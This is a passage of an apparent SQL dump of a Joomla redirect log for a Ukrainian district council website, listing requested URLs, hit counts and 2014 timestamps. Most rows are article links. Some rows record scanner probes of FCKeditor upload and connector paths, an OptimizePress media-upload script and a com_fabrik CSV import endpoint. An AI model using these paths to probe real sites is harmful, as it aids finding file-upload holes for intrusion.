00:00:00',301),(11356,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=970:-90-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-28 10:09:11','0000-00-00 00:00:00',301),(11357,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-11-28 10:09:20','0000-00-00 00:00:00',301),(11358,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-11-28 10:09:23','0000-00-00 00:00:00',301),(11359,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-11-28 10:09:37','0000-00-00 00:00:00',301),(11360,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/928-pro-spisannya-osnovnikh-zasobiv-viddil-osviti','','','',9,0,'2014-11-28 10:28:48','0000-00-00 00:00:00',301),(11361,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/930-pro-nadannya-dozvolu-na-vidchuzhennya-ob-ekta-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu','','','',7,0,'2014-11-28 11:44:32','0000-00-00 00:00:00',301),(11362,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1141:2013-11-26-13-18-12&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',4,0,'2014-11-28 15:30:10','0000-00-00 00:00:00',301),(11363,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',8,0,'2014-11-28 19:16:36','0000-00-00 00:00:00',301),(11364,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1218:2014-02-21-15-02-18&catid=11&Itemid=14&lang=ru','','','',8,0,'2014-11-29 00:39:43','0000-00-00 00:00:00',301),(11365,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11&Itemid=14&lang=ru','','','',11,0,'2014-11-29 10:22:49','0000-00-00 00:00:00',301),(11366,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1191:------2014-&catid=36&Itemid=70&lang=uk','','','',12,0,'2014-11-29 15:04:58','0000-00-00 00:00:00',301),(11367,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1207:-----------------2007-2015-&catid=36&Itemid=70&lang=ru','','','',1,0,'2014-11-29 16:05:23','0000-00-00 00:00:00',301),(11368,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:----20-----&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-11-29 21:18:51','0000-00-00 00:00:00',301),(11369,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:----20-----&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-11-29 21:21:10','0000-00-00 00:00:00',301),(11370,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-11-29 21:30:12','0000-00-00 00:00:00',301),(11371,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1052:2013-07-19-11-32-33&catid=51:--19072013-&Itemid=92&lang=ru','','','',3,0,'2014-11-29 22:27:18','0000-00-00 00:00:00',301),(11372,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1052:2013-07-19-11-32-33&catid=51:--19072013-&Itemid=92&lang=uk','','','',3,0,'2014-11-29 22:44:03','0000-00-00 00:00:00',301),(11373,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/928-pro-spisannya-osnovnikh-zasobiv-viddil-osviti','','','',9,0,'2014-11-30 01:19:21','0000-00-00 00:00:00',301),(11374,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1196:2014-01-30-14-12-50&catid=11&lang=ru','','','',9,0,'2014-11-30 10:54:59','0000-00-00 00:00:00',301),(11375,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1340:-l-28r&catid=59:--20062014-&Itemid=107&lang=en','','','',1,0,'2014-11-30 12:19:37','0000-00-00 00:00:00',301),(11376,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1340:-l-28r&catid=59:--20062014-&Itemid=107&lang=ru','','','',1,0,'2014-11-30 12:19:54','0000-00-00 00:00:00',301),(11377,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1340:-l-28r&catid=59:--20062014-&Itemid=107&lang=uk','','','',1,0,'2014-11-30 12:20:11','0000-00-00 00:00:00',301),(11378,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1341:-14052014-&catid=59:--20062014-&Itemid=107&lang=en','','','',1,0,'2014-11-30 12:20:16','0000-00-00 00:00:00',301),(11379,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1341:-14052014-&catid=59:--20062014-&Itemid=107&lang=ru','','','',1,0,'2014-11-30 12:20:30','0000-00-00 00:00:00',301),(11380,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1341:-14052014-&catid=59:--20062014-&Itemid=107&lang=uk','','','',1,0,'2014-11-30 12:20:42','0000-00-00 00:00:00',301),(11381,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&lang=uk','','','',1,0,'2014-11-30 12:20:50','0000-00-00 00:00:00',301),(11382,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1344:-25-2013-464-l-&catid=59:--20062014-&Itemid=107&lang=uk','','','',1,0,'2014-11-30 12:20:55','0000-00-00 00:00:00',301),(11383,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&lang=uk','','','',1,0,'2014-11-30 12:21:06','0000-00-00 00:00:00',301),(11384,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&lang=uk','','','',1,0,'2014-11-30 12:21:10','0000-00-00 00:00:00',301),(11385,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11&lang=uk','','','',1,0,'2014-11-30 12:21:19','0000-00-00 00:00:00',301),(11386,'http://malyn-rayrada.org.ua/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=2','','','',5,0,'2014-11-30 18:57:24','0000-00-00 00:00:00',301),(11387,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11&lang=uk','','','',1,0,'2014-11-30 21:15:47','0000-00-00 00:00:00',301),(11388,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11&lang=uk','','','',1,0,'2014-11-30 21:16:13','0000-00-00 00:00:00',301),(11389,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1146:2013-11-27-10-09-00&catid=11&lang=uk','','','',1,0,'2014-11-30 21:16:31','0000-00-00 00:00:00',301),(11390,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11&lang=uk','','','',1,0,'2014-11-30 21:16:42','0000-00-00 00:00:00',301),(11391,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1182:2014-01-23-06-45-09&catid=11&lang=uk','','','',2,0,'2014-11-30 21:16:49','0000-00-00 00:00:00',301),(11392,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=949:2013-03-06-12-51-36&catid=49&Itemid=88&lang=uk','','','',3,0,'2014-11-30 21:25:43','0000-00-00 00:00:00',301),(11393,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=968:-2012-&catid=11&lang=uk','','','',1,0,'2014-11-30 21:26:03','0000-00-00 00:00:00',301),(11394,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=992:-3-&catid=11&lang=uk','','','',1,0,'2014-11-30 21:27:06','0000-00-00 00:00:00',301),(11395,'http://www.malyn-rayrada.org.ua/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=2','','','',7,0,'2014-12-01 01:36:33','0000-00-00 00:00:00',301),(11396,'http://malyn-rayrada.org.ua/index.php/deputatska-storinka/media/system/images/mootree_loader.gif','','http://malyn-rayrada.org.ua/index.php/deputatska-storinka/publichna-informacija_2','',9,0,'2014-12-01 03:16:05','0000-00-00 00:00:00',301),(11397,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/media/system/images/mootree_loader.gif','','http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen','',1,0,'2014-12-01 03:25:47','0000-00-00 00:00:00',301),(11398,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/media/system/images/mootree_loader.gif','','http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014','',5,0,'2014-12-01 03:26:20','0000-00-00 00:00:00',301),(11399,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/926-pro-zatverdzhennya-pereliku-ob-ektiv-shcho-pidlyagayut-privatizatsiji-u-2014-2015-rokakh','','','',4,0,'2014-12-01 08:07:06','0000-00-00 00:00:00',301),(11400,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1194:-2012-2015-&catid=56&Itemid=97&lang=uk','','','',1,0,'2014-12-01 11:04:02','0000-00-00 00:00:00',301),(11401,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=27:2010-06-07-11-05-24&catid=21&Itemid=47&lang=uk','','','',1,0,'2014-12-01 11:05:29','0000-00-00 00:00:00',301),(11402,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=27:2010-06-07-11-05-24&catid=21:2010-06-07-09-43-24&Itemid=47&lang=en','','','',1,0,'2014-12-01 11:05:32','0000-00-00 00:00:00',301),(11403,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=27:2010-06-07-11-05-24&catid=21:2010-06-07-09-43-24&Itemid=47&lang=ru','','','',1,0,'2014-12-01 11:05:34','0000-00-00 00:00:00',301),(11404,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=955:2013-03-07-06-31-04&catid=48&Itemid=87&lang=uk','','','',1,0,'2014-12-01 11:17:18','0000-00-00 00:00:00',301),(11405,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=955:2013-03-07-06-31-04&catid=48:--11032013-&Itemid=87&lang=ru','','','',1,0,'2014-12-01 11:17:20','0000-00-00 00:00:00',301),(11406,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=955:2013-03-07-06-31-04&catid=48:--11032013-&Itemid=87&lang=uk','','','',1,0,'2014-12-01 11:17:23','0000-00-00 00:00:00',301),(11407,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=962:-2017-&catid=49&Itemid=88&lang=uk','','','',1,0,'2014-12-01 11:17:38','0000-00-00 00:00:00',301),(11408,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=988:-2013-&catid=49:--12042013-&Itemid=88&lang=en','','','',1,0,'2014-12-01 11:17:44','0000-00-00 00:00:00',301),(11409,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1031:2013-06-17-06-49-26&catid=51:--19072013-&Itemid=92&lang=en','','','',1,0,'2014-12-01 11:18:53','0000-00-00 00:00:00',301),(11410,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-12-01 11:37:08','0000-00-00 00:00:00',301),(11411,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&lang=ru&Itemid=0','','','',1,0,'2014-12-01 11:44:30','0000-00-00 00:00:00',301),(11412,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=1&Itemid=1&lang=en','','','',1,0,'2014-12-01 11:44:53','0000-00-00 00:00:00',301),(11413,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=0&lang=ru','','','',1,0,'2014-12-01 11:45:43','0000-00-00 00:00:00',301),(11414,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=3&Itemid=0&lang=uk','','','',1,0,'2014-12-01 11:45:45','0000-00-00 00:00:00',301),(11415,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1026:2013-06-14-05-02-34&catid=51:--19072013-&Itemid=92&lang=en','','','',1,0,'2014-12-01 11:46:43','0000-00-00 00:00:00',301),(11416,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1026:2013-06-14-05-02-34&catid=51:--19072013-&Itemid=92&lang=ru','','','',1,0,'2014-12-01 11:46:46','0000-00-00 00:00:00',301),(11417,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1275:2014-04-10-13-24-47&catid=57:--15042014-&Itemid=98&lang=en','','','',1,0,'2014-12-01 13:41:41','0000-00-00 00:00:00',301),(11418,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1276:2014-04-10-13-26-15&catid=57:--15042014-&Itemid=98&lang=en','','','',1,0,'2014-12-01 13:41:51','0000-00-00 00:00:00',301),(11419,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1277:-2014-&catid=57:--15042014-&Itemid=98&lang=ru','','','',1,0,'2014-12-01 13:42:19','0000-00-00 00:00:00',301),(11420,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1280:-2014-&catid=57:--15042014-&Itemid=98&lang=en','','','',1,0,'2014-12-01 13:42:36','0000-00-00 00:00:00',301),(11421,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11&lang=uk','','','',1,0,'2014-12-01 13:43:14','0000-00-00 00:00:00',301),(11422,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11&lang=uk','','','',1,0,'2014-12-01 13:43:17','0000-00-00 00:00:00',301),(11423,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11&lang=uk','','','',1,0,'2014-12-01 13:43:25','0000-00-00 00:00:00',301),(11424,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1287:2014-04-23-06-49-34&catid=10&Itemid=17&lang=uk','','','',5,0,'2014-12-01 13:43:32','0000-00-00 00:00:00',301),(11425,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1289:2014-04-23-06-53-01&catid=10&Itemid=17&lang=uk','','','',1,0,'2014-12-01 13:43:58','0000-00-00 00:00:00',301),(11426,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1294:-2012-2015-&catid=58:--30042014-&Itemid=105&lang=en','','','',1,0,'2014-12-01 13:44:10','0000-00-00 00:00:00',301),(11427,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15&lang=uk','','','',1,0,'2014-12-01 13:44:20','0000-00-00 00:00:00',301),(11428,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1303:2014-04-29-13-13-18&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',1,0,'2014-12-01 13:45:01','0000-00-00 00:00:00',301),(11429,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1307:2014-04-30-15-26-52&catid=10&Itemid=17&lang=uk','','','',1,0,'2014-12-01 13:45:46','0000-00-00 00:00:00',301),(11430,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11&lang=uk','','','',1,0,'2014-12-01 13:46:52','0000-00-00 00:00:00',301),(11431,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-12-01 13:47:07','0000-00-00 00:00:00',301),(11432,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&Itemid=14&lang=en','','','',1,0,'2014-12-01 13:47:42','0000-00-00 00:00:00',301),(11433,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-12-01 13:48:03','0000-00-00 00:00:00',301),(11434,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1344:-25-2013-464-l-&catid=59:--20062014-&Itemid=107&lang=en','','','',1,0,'2014-12-01 13:48:09','0000-00-00 00:00:00',301),(11435,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1344:-25-2013-464-l-&catid=59:--20062014-&Itemid=107&lang=ru','','','',1,0,'2014-12-01 13:48:12','0000-00-00 00:00:00',301),(11436,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1345:2014-06-17-07-48-07&catid=59:--20062014-&Itemid=107&lang=en','','','',1,0,'2014-12-01 13:48:15','0000-00-00 00:00:00',301),(11437,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1345:2014-06-17-07-48-07&catid=59:--20062014-&Itemid=107&lang=ru','','','',1,0,'2014-12-01 13:48:18','0000-00-00 00:00:00',301),(11438,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1345:2014-06-17-07-48-07&catid=59:--20062014-&Itemid=107&lang=uk','','','',1,0,'2014-12-01 13:48:21','0000-00-00 00:00:00',301),(11439,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&Itemid=14&lang=en','','','',1,0,'2014-12-01 13:48:24','0000-00-00 00:00:00',301),(11440,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-12-01 13:48:27','0000-00-00 00:00:00',301),(11441,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&Itemid=14&lang=en','','','',1,0,'2014-12-01 13:48:32','0000-00-00 00:00:00',301),(11442,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-12-01 13:48:35','0000-00-00 00:00:00',301),(11443,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-12-01 13:48:38','0000-00-00 00:00:00',301),(11444,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1348:2014-06-20-13-13-51&catid=59:--20062014-&Itemid=107&lang=en','','','',1,0,'2014-12-01 13:48:41','0000-00-00 00:00:00',301),(11445,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1348:2014-06-20-13-13-51&catid=59:--20062014-&Itemid=107&lang=ru','','','',1,0,'2014-12-01 13:48:43','0000-00-00 00:00:00',301),(11446,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1348:2014-06-20-13-13-51&catid=59:--20062014-&Itemid=107&lang=uk','','','',1,0,'2014-12-01 13:48:47','0000-00-00 00:00:00',301),(11447,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11&Itemid=14&lang=en','','','',1,0,'2014-12-01 13:48:49','0000-00-00 00:00:00',301),(11448,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-12-01 13:48:52','0000-00-00 00:00:00',301),(11449,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1350:2014-06-23-07-06-24&catid=59:--20062014-&Itemid=107&lang=en','','','',1,0,'2014-12-01 13:48:57','0000-00-00 00:00:00',301),(11450,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1350:2014-06-23-07-06-24&catid=59:--20062014-&Itemid=107&lang=ru','','','',1,0,'2014-12-01 13:49:00','0000-00-00 00:00:00',301),(11451,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1350:2014-06-23-07-06-24&catid=59:--20062014-&Itemid=107&lang=uk','','','',1,0,'2014-12-01 13:49:03','0000-00-00 00:00:00',301),(11452,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1351:-2014-&catid=59:--20062014-&Itemid=107&lang=en','','','',1,0,'2014-12-01 13:49:06','0000-00-00 00:00:00',301),(11453,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1351:-2014-&catid=59:--20062014-&Itemid=107&lang=ru','','','',1,0,'2014-12-01 13:49:09','0000-00-00 00:00:00',301),(11454,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=853:2012-12-11-13-39-46&catid=32:2011-03-31-12-03-04&Itemid=64&lang=en','','','',1,0,'2014-12-01 13:49:51','0000-00-00 00:00:00',301),(11455,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=854:2012-12-11-13-40-55&catid=32:2011-03-31-12-03-04&Itemid=64&lang=ru','','','',1,0,'2014-12-01 13:50:03','0000-00-00 00:00:00',301),(11456,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-12-01 16:20:58','0000-00-00 00:00:00',301),(11457,'http://www.malyn-rayrada.org.ua/admin/fckeditor/editor/filemanager/browser/default/connectors/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','','','',3,0,'2014-12-01 16:45:13','0000-00-00 00:00:00',301),(11458,'http://www.malyn-rayrada.org.ua/mailing/tools/fckeditor/editor/filemanager/browser/default/connectors/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','','','',2,0,'2014-12-01 16:45:17','0000-00-00 00:00:00',301),(11459,'http://www.malyn-rayrada.org.ua/sys/FCKeditor/editor/filemanager/upload/php/upload.php','','','',1,0,'2014-12-01 16:46:15','0000-00-00 00:00:00',301),(11460,'http://www.malyn-rayrada.org.ua/editor/editor/filemanager/upload/php/upload.php','','','',1,0,'2014-12-01 16:46:23','0000-00-00 00:00:00',301),(11461,'http://www.malyn-rayrada.org.ua/tools/FCKeditor/editor/filemanager/upload/php/upload.php','','','',1,0,'2014-12-01 16:46:34','0000-00-00 00:00:00',301),(11462,'http://www.malyn-rayrada.org.ua/sladmin/FCKEditor/editor/filemanager/upload/php/upload.php','','','',1,0,'2014-12-01 16:46:38','0000-00-00 00:00:00',301),(11463,'http://www.malyn-rayrada.org.ua/components/FCKeditor/editor/filemanager/upload/php/upload.php','','','',1,0,'2014-12-01 16:46:44','0000-00-00 00:00:00',301),(11464,'http://www.malyn-rayrada.org.ua/storelocator/sladmin/FCKEditor/editor/filemanager/upload/php/upload.php','','','',1,0,'2014-12-01 16:46:50','0000-00-00 00:00:00',301),(11465,'http://www.malyn-rayrada.org.ua/include/FCKeditor/editor/filemanager/upload/php/upload.php','','','',2,0,'2014-12-01 16:46:54','0000-00-00 00:00:00',301),(11466,'http://www.malyn-rayrada.org.ua/managment/fckeditor/editor/filemanager/upload/php/upload.php','','','',1,0,'2014-12-01 16:46:58','0000-00-00 00:00:00',301),(11467,'http://www.malyn-rayrada.org.ua/include/js/fckeditor/editor/filemanager/upload/php/upload.php','','','',1,0,'2014-12-01 16:47:10','0000-00-00 00:00:00',301),(11468,'http://www.malyn-rayrada.org.ua/webadmin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','','','',1,0,'2014-12-01 16:47:17','0000-00-00 00:00:00',301),(11469,'http://www.malyn-rayrada.org.ua/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','','','',2,0,'2014-12-01 16:47:20','0000-00-00 00:00:00',301),(11470,'http://www.malyn-rayrada.org.ua/webmaster/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','','','',1,0,'2014-12-01 16:49:19','0000-00-00 00:00:00',301),(11471,'http://www.malyn-rayrada.org.ua/webmanager/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','','','',1,0,'2014-12-01 16:49:23','0000-00-00 00:00:00',301),(11472,'http://www.malyn-rayrada.org.ua/manage/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','','','',1,0,'2014-12-01 16:49:27','0000-00-00 00:00:00',301),(11473,'http://www.malyn-rayrada.org.ua/manager/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','','','',1,0,'2014-12-01 16:49:34','0000-00-00 00:00:00',301),(11474,'http://www.malyn-rayrada.org.ua/power/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','','','',1,0,'2014-12-01 16:49:37','0000-00-00 00:00:00',301),(11475,'http://www.malyn-rayrada.org.ua/super/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','','','',1,0,'2014-12-01 16:49:41','0000-00-00 00:00:00',301),(11476,'http://www.malyn-rayrada.org.ua/sys/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','','','',1,0,'2014-12-01 16:49:45','0000-00-00 00:00:00',301),(11477,'http://www.malyn-rayrada.org.ua/system/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','','','',1,0,'2014-12-01 16:49:49','0000-00-00 00:00:00',301),(11478,'http://www.malyn-rayrada.org.ua/inc/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','','','',1,0,'2014-12-01 16:49:53','0000-00-00 00:00:00',301),(11479,'http://www.malyn-rayrada.org.ua/include/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','','','',1,0,'2014-12-01 16:49:57','0000-00-00 00:00:00',301),(11480,'http://www.malyn-rayrada.org.ua/editor/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','','','',1,0,'2014-12-01 16:50:02','0000-00-00 00:00:00',301),(11481,'http://www.malyn-rayrada.org.ua/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','','','',1,0,'2014-12-01 16:50:07','0000-00-00 00:00:00',301),(11482,'http://www.malyn-rayrada.org.ua/backend/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','','','',1,0,'2014-12-01 16:50:14','0000-00-00 00:00:00',301),(11483,'http://www.malyn-rayrada.org.ua/fck/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','','','',1,0,'2014-12-01 16:50:18','0000-00-00 00:00:00',301),(11484,'http://www.malyn-rayrada.org.ua/wp-content/themes/OptimizePress/lib/admin/media-upload.php','','','',1,0,'2014-12-01 16:50:24','0000-00-00 00:00:00',301),(11485,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=949:2013-03-06-12-51-36&catid=49&Itemid=88&lang=ru','','','',1,0,'2014-12-01 18:21:05','0000-00-00 00:00:00',301),(11486,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1055:2013-07-19-11-43-17&catid=51:--19072013-&Itemid=92&lang=en','','','',3,0,'2014-12-01 19:37:35','0000-00-00 00:00:00',301),(11487,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11&lang=en','','','',1,0,'2014-12-01 20:29:20','0000-00-00 00:00:00',301),(11488,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1249:2014-03-24-06-41-46&catid=36&Itemid=70&lang=uk','','','',8,0,'2014-12-01 23:08:53','0000-00-00 00:00:00',301),(11489,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1100:2013-10-02-18-03-10&lang=uk&option=com_content&view=article','','http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11%3A2010-06-05-14-33-33&id=1100%3A2013-10-02-18-03-10&lang=uk&option=com_content&view=artic','',5,0,'2014-12-01 23:19:39','0000-00-00 00:00:00',301),(11490,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=949:2013-03-06-12-51-36&catid=36&Itemid=70&lang=uk','','','',4,0,'2014-12-02 00:07:10','0000-00-00 00:00:00',301),(11491,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=949:2013-03-06-12-51-36&catid=49:--12042013-&Itemid=88&lang=ru','','','',2,0,'2014-12-02 00:52:39','0000-00-00 00:00:00',301),(11492,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=949:2013-03-06-12-51-36&catid=49:--12042013-&Itemid=88&lang=uk','','','',1,0,'2014-12-02 00:59:54','0000-00-00 